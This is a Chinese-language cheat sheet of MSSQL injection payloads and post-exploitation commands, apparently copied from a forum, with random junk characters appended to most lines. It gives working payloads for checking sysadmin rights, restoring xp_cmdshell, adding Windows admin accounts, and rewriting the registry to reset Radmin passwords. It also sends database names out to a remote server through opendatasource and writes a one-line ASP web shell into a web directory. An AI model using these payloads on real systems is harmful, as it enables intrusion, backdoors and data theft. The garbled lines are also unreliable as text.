//看看是什么权限的( @5 h3 R6 D4 G* F) U
and 1=(Select IS_MEMBER('db_owner'))/ p- _" r$ p0 |$ f+ [8 q
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
7 }! O: J% P2 Y2 R# K/ Y- U
/ {! u6 Z3 ^1 A( t9 F//检测是否有读取某数据库的权限, q9 y$ o( l/ h. L
and 1= (Select HAS_DBACCESS('master'))
& J6 K1 l5 D& K7 e) AAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
. T/ j8 n7 C! K
3 q; P6 W) F @) [4 y0 j1 r4 U; H& u) R- b s& r9 j6 k
数字类型& X9 f5 A( A' {/ U! ~: v8 `
and char(124)%2Buser%2Bchar(124)=0
4 R1 ^4 c* l" G6 e. v8 B+ Y+ G- C q5 i7 T
字符类型
- t7 R4 s i8 Q3 J- W+ @' and char(124)%2Buser%2Bchar(124)=0 and ''='$ }9 {. n4 K3 O% t- f# R
$ \' x3 g5 a" F4 I7 t6 Z搜索类型
6 Q- J+ Z& R5 ]/ d3 d9 f( S' and char(124)%2Buser%2Bchar(124)=0 and '%'='! e5 l) v% ^* P0 c& F: G% x |
. Y% V& b2 h; A) ]( k9 Z1 i8 ]爆用户名3 |( ~6 D% y4 ^4 }) |, z4 |) p* a
and user>0! A6 j+ x" C* P7 ~ D% R! Q
' and user>0 and ''='3 S, N9 t8 ^% L4 v
6 P" n& X. F8 C& F* H- B* r检测是否为SA权限& q1 X- g' e( W4 a% m3 x6 r1 i
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
8 c" t2 ^* ?0 U' y% ]1 E$ {! OAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --' m6 b1 c2 K7 {3 H
2 E" ?* Q2 K+ R3 p
检测是不是MSSQL数据库* Y6 g, H1 Y2 ]# q
and exists (select * from sysobjects);--) A! C# @6 j# I; o9 h
& @/ b: T/ ]3 L( Q6 A* ~8 v. I
检测是否支持多行
3 c8 C: n; Z# `) W% e6 p1 @! H;declare @d int;--
* T* T/ i7 y% }& D9 h. e! h4 i
7 a3 \0 b+ c" F( W, `# ^恢复 xp_cmdshell! B9 G4 I1 l3 d$ @
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--5 Z4 K! e( e$ v
; G; [) `5 r+ K, w7 J
# i2 b+ M8 H7 g6 v
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')* @; a v8 V! K& N0 g2 x
+ Z8 w6 i) k( [+ u0 D. V; t
//-----------------------
" R( _. v, o/ @0 @5 e$ `6 C// 执行命令- Q6 F: y1 a+ s
//-----------------------) `- D0 C! K8 C% o+ y
首先开启沙盘模式:
" p4 y: r8 R- `/ S. b5 {& O# b$ Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1) h/ @/ o \- R$ K9 O' W6 U, {
. t5 c2 T3 V: I9 E- Q& ^% t/ A! F
然后利用jet.oledb执行系统命令% ~4 s+ [# M8 p$ o
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
2 ]5 B5 t8 D1 I5 \6 ^* u) S/ T& a/ t5 B5 c& A% F/ B
执行命令& P& B5 k/ F5 E6 _6 l& t
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--1 @9 }$ k3 z- y1 o2 ]" k! |
' E1 i2 H5 V1 {5 X, _5 g) k
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
* h; x* n5 m+ u! W* C: o% n" _
3 i. O6 J4 d+ D1 n+ X, t- a% F判断xp_cmdshell扩展存储过程是否存在:
7 ]$ o1 z+ z% q/ `http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
! i1 O3 U X% p, G0 }3 G
3 k5 C9 F2 _) D% T9 {写注册表( X; q2 w) ~: B: _" f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: r9 `6 w. c- j& n6 }/ } ]
1 f( s' P/ H5 Q/ _2 A) A
REG_SZ) k6 F0 f4 @4 @* e+ T! l9 G: U
8 K3 q- j& N7 Y* _# }5 u
读注册表7 N2 x+ k g" D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
0 V* e5 n/ Q2 p8 ]4 s+ S
5 d& l3 r3 H$ t% n( j/ j读取目录内容% h7 h. A, o8 m
exec master..xp_dirtree 'c:\winnt\system32\',1,1
1 u) t: t% {- P: |
) N6 R& s& H/ i1 b7 D& R+ x2 x8 y" a" ?. S* U; X) {
数据库备份- w5 R# y% n' l. z4 h
backup database pubs to disk = 'c:\123.bak'" L( p V) ?" d" n
$ ^5 E/ r6 _5 o6 n6 D
//爆出长度 F; ~, N4 {+ Q9 O: y/ s( d% |
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
/ T# H- i. r! {! c% [: g- Q7 l; |3 O# |8 }. P" e
6 K. k2 D* Y ~( a: E* o3 b" y+ s( _" X% N# \7 B8 j
更改sa口令方法:用sql综合利用工具连接后,执行命令:
1 G% T6 v. @! g; o( t: Vexec sp_password NULL,'新密码','sa'3 y# g/ A8 d( c* q. o, j% e
) o( ~* ?, t; F6 T8 ?, `
添加和删除一个SA权限的用户test:
1 e. z+ b" g* r+ v3 Mexec master.dbo.sp_addlogin test,9530772; Z7 z' n' n2 S
exec master.dbo.sp_addsrvrolemember test,sysadmin% o6 c9 t8 `! y8 W% f1 S
* e! o/ E+ ~0 t! ]删除扩展存储过过程xp_cmdshell的语句:/ H+ M) k( w3 E; u" Q$ a
exec sp_dropextendedproc 'xp_cmdshell'
& ~( m9 r+ ~8 {: t7 X* ?7 u- z _% U( u" o( H
添加扩展存储过过程
; U" b3 W. V: W. }% d* lEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 }5 ?0 F' U$ y' b; _GRANT exec On xp_proxiedadata TO public. ]6 p& \) B" D
2 ?4 F/ p9 D( G! ^; R/ o
0 i1 m G/ t1 L9 L4 n* ]
停掉或激活某个服务。9 l3 g$ [" s3 s7 {
3 `- m, u! l, v1 h0 y( Oexec master..xp_servicecontrol 'stop','schedule': R9 T+ H3 C, g1 E
exec master..xp_servicecontrol 'start','schedule'/ s: P5 c! ^" Q, t; R0 f
" {: K( c# c, Z& K' Jdbo.xp_subdirs
" M6 ~8 ^8 u3 _! \& N6 }. h3 R8 W, b0 |, Y3 b' L1 F
只列某个目录下的子目录。* W: d4 g# Q! B1 e
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'0 `& s$ C7 n; Y# `& o
* O0 ?, H( B3 s# L# H# u. e+ C4 k# D
dbo.xp_makecab
3 I4 y9 C& b! n+ e5 r3 Y6 ?0 ^, `7 M; C" U
将目标多个档案压缩到某个目标档案之内。
1 z$ [: e" M( f7 Z! r所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
4 h% K+ B# P: [+ ~7 Q8 K0 y* ~" q; @2 }4 n% K. @+ y% p
dbo.xp_makecab5 D& Z1 N1 [3 y* Y
'c:\test.cab','mszip',1,
5 I( I3 F- } G5 L'C:\Inetpub\wwwroot\SQLInject\login.asp',0 ]! c" }- i4 V( i
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
0 r* y5 q, @+ B+ I# W2 O, s: Y& w- s) L
xp_terminate_process
; _8 ?$ p8 ^* U: c7 Y7 ^" e; `6 ^: B
7 {8 M" e9 d+ R9 x停掉某个执行中的程序,但赋予的参数是 Process ID。# l+ {" W5 s @- [
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID& m" j, a" U# V
- s! R/ A' ?- J$ U
xp_terminate_process 2484
2 m- g3 ^6 Q) S/ ^# } M
( t/ h5 c+ M3 ~5 |xp_unpackcab
; _3 z) n7 c. R/ C9 v6 J Q8 J
1 S3 g" K3 Y& B( e解开压缩档。
/ A; `9 @- O/ N- s& w$ J: G: e9 B* C+ p# l3 w3 i9 q
xp_unpackcab 'c:\test.cab','c:\temp',15 I; i$ Z8 V* Q7 _# V, h
+ X0 a5 g* B) i4 H$ W n% Z+ E9 [( V# \; h3 `
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
8 ^' s/ T ^( J- i; ^" a$ o R2 C( y6 s
create database lcx;
) i, \% p' X X' S) o ^Create TABLE ku(name nvarchar(256) null);$ G* i+ ]6 W0 J
Create TABLE biao(id int NULL,name nvarchar(256) null);
% p: i: @+ n" M) r) ]
3 N8 }% A6 O- m" f//得到数据库名
0 a6 f0 A5 H+ Q" Ninsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
) @* ]! g3 p8 k2 y4 W4 W' o; x0 R4 t/ C/ n! v- u6 b ?
8 I' X! i: f- T5 k7 n
//在Master中创建表,看看权限怎样9 K( d( I$ h- j* V
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--$ M; z+ y8 t$ d* r4 Y$ d' q8 u2 X3 l
6 X, o7 K5 @! I& w用 sp_makewebtask直接在web目录里写入一句话马:
4 P* h6 K4 Z* R1 hhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--2 ^. Q) K5 j6 ^1 I9 B& j' G
( S/ q& s. q; V2 ]. [+ ~
//更新表内容# U9 n+ N) ?$ h1 d. Q
Update films SET kind = 'Dramatic' Where id = 123, r- C6 _7 g: [% A' X+ \% k7 H
* Q' N( d/ m; \3 U//删除内容- T* l" t6 ?/ F, i
delete from table_name where Stockid = 3 |